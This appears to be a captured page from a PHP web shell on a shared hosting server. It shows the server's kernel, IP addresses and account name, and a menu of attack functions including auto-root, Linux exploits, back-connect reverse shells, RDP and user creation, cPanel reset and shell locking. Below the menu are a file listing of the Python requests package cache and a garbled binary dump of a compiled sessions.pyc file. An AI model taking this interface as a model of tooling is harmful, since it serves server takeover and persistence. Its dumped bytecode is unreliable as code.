Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.140
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
python3.9 /
site-packages /
requests /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-39.opt-1.pyc
3.21
KB
-rw-r--r--
__init__.cpython-39.pyc
3.35
KB
-rw-r--r--
__version__.cpython-39.opt-1.p...
507
B
-rw-r--r--
__version__.cpython-39.pyc
507
B
-rw-r--r--
_internal_utils.cpython-39.opt...
1.2
KB
-rw-r--r--
_internal_utils.cpython-39.pyc
1.22
KB
-rw-r--r--
adapters.cpython-39.opt-1.pyc
22.06
KB
-rw-r--r--
adapters.cpython-39.pyc
22.06
KB
-rw-r--r--
api.cpython-39.opt-1.pyc
6.55
KB
-rw-r--r--
api.cpython-39.pyc
6.55
KB
-rw-r--r--
auth.cpython-39.opt-1.pyc
8.09
KB
-rw-r--r--
auth.cpython-39.pyc
8.09
KB
-rw-r--r--
certs.cpython-39.opt-1.pyc
832
B
-rw-r--r--
certs.cpython-39.pyc
832
B
-rw-r--r--
compat.cpython-39.opt-1.pyc
1.57
KB
-rw-r--r--
compat.cpython-39.pyc
1.57
KB
-rw-r--r--
cookies.cpython-39.opt-1.pyc
18.33
KB
-rw-r--r--
cookies.cpython-39.pyc
18.33
KB
-rw-r--r--
exceptions.cpython-39.opt-1.py...
5.06
KB
-rw-r--r--
exceptions.cpython-39.pyc
5.06
KB
-rw-r--r--
help.cpython-39.opt-1.pyc
2.55
KB
-rw-r--r--
help.cpython-39.pyc
2.55
KB
-rw-r--r--
hooks.cpython-39.opt-1.pyc
942
B
-rw-r--r--
hooks.cpython-39.pyc
942
B
-rw-r--r--
models.cpython-39.opt-1.pyc
23.26
KB
-rw-r--r--
models.cpython-39.pyc
23.26
KB
-rw-r--r--
packages.cpython-39.opt-1.pyc
361
B
-rw-r--r--
packages.cpython-39.pyc
361
B
-rw-r--r--
sessions.cpython-39.opt-1.pyc
19.35
KB
-rw-r--r--
sessions.cpython-39.pyc
19.35
KB
-rw-r--r--
status_codes.cpython-39.opt-1....
4.09
KB
-rw-r--r--
status_codes.cpython-39.pyc
4.09
KB
-rw-r--r--
structures.cpython-39.opt-1.py...
4.31
KB
-rw-r--r--
structures.cpython-39.pyc
4.31
KB
-rw-r--r--
utils.cpython-39.opt-1.pyc
23.19
KB
-rw-r--r--
utils.cpython-39.pyc
23.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sessions.cpython-39.pyc
a �/�hzv � @ s� d Z ddlZddlZddlZddlmZ ddlmZ ddlm Z ddl mZmZm Z mZmZ ddlmZmZmZmZ dd lmZmZmZ dd lmZmZ ddlmZ ddlmZm Z m!Z! dd l"m#Z#m$Z$m%Z%m&Z& ddl'm(Z( ddl)m*Z* ddlm+Z+m,Z,m-Z-m.Z.m/Z/m0Z0 ddl1m2Z2 ddlm3Z3 ej4dk�rTz ej5Z6W n e7�yP ej8Z6Y n0 nejZ6efdd�Z9efdd�Z:G dd� de;�Z<G dd� de<�Z=dd� Z>dS )z� requests.sessions ~~~~~~~~~~~~~~~~~ This module provides a Session object to manage and persist settings across requests (cookies, auth, proxies). � N)� timedelta)�OrderedDict� )�_basic_auth_str)� cookielib�is_py3�urljoin�urlparse�Mapping)�cookiejar_from_dict�extract_cookies_to_jar�RequestsCookieJar� merge_cookies)�Request�PreparedRequest�DEFAULT_REDIRECT_LIMIT)� default_hooks� dispatch_hook)�to_native_string)�to_key_val_list�default_headers� DEFAULT_PORTS)�TooManyRedirects� InvalidSchema�ChunkedEncodingError�ContentDecodingError)�CaseInsensitiveDict)�HTTPAdapter)�requote_uri�get_environ_proxies�get_netrc_auth�should_bypass_proxies�get_auth_from_url�rewind_body)�codes)�REDIRECT_STATI�win32c C sp |du r| S | du r|S t |t�r,t | t�s0| S |t|��}|�t| �� dd� |�� D �}|D ] }||= q`|S )z�Determines appropriate setting for a given request, taking into account the explicit setting on that request, and the setting in the session. If a setting is a dictionary, they will be merged together using `dict_class` Nc S s g | ]\}}|d u r|�qS �N� )�.0�k�vr( r( �5/usr/lib/python3.9/site-packages/requests/sessions.py� <listcomp>J � z!merge_setting.<locals>.<listcomp>)� isinstancer r �update�items)Zrequest_settingZsession_setting� dict_classZmerged_settingZ none_keys�keyr( r( r, � merge_setting2 s ��r4 c C s@ |du s|� d�g kr| S | du s0| � d�g kr4|S t| ||�S )z�Properly merges both requests and session hooks. This is necessary because when request_hooks == {'response': []}, the merge breaks Session hooks entirely. N�response)�getr4 )Z request_hooksZ session_hooksr2 r( r( r, �merge_hooksQ s r7 c @ s>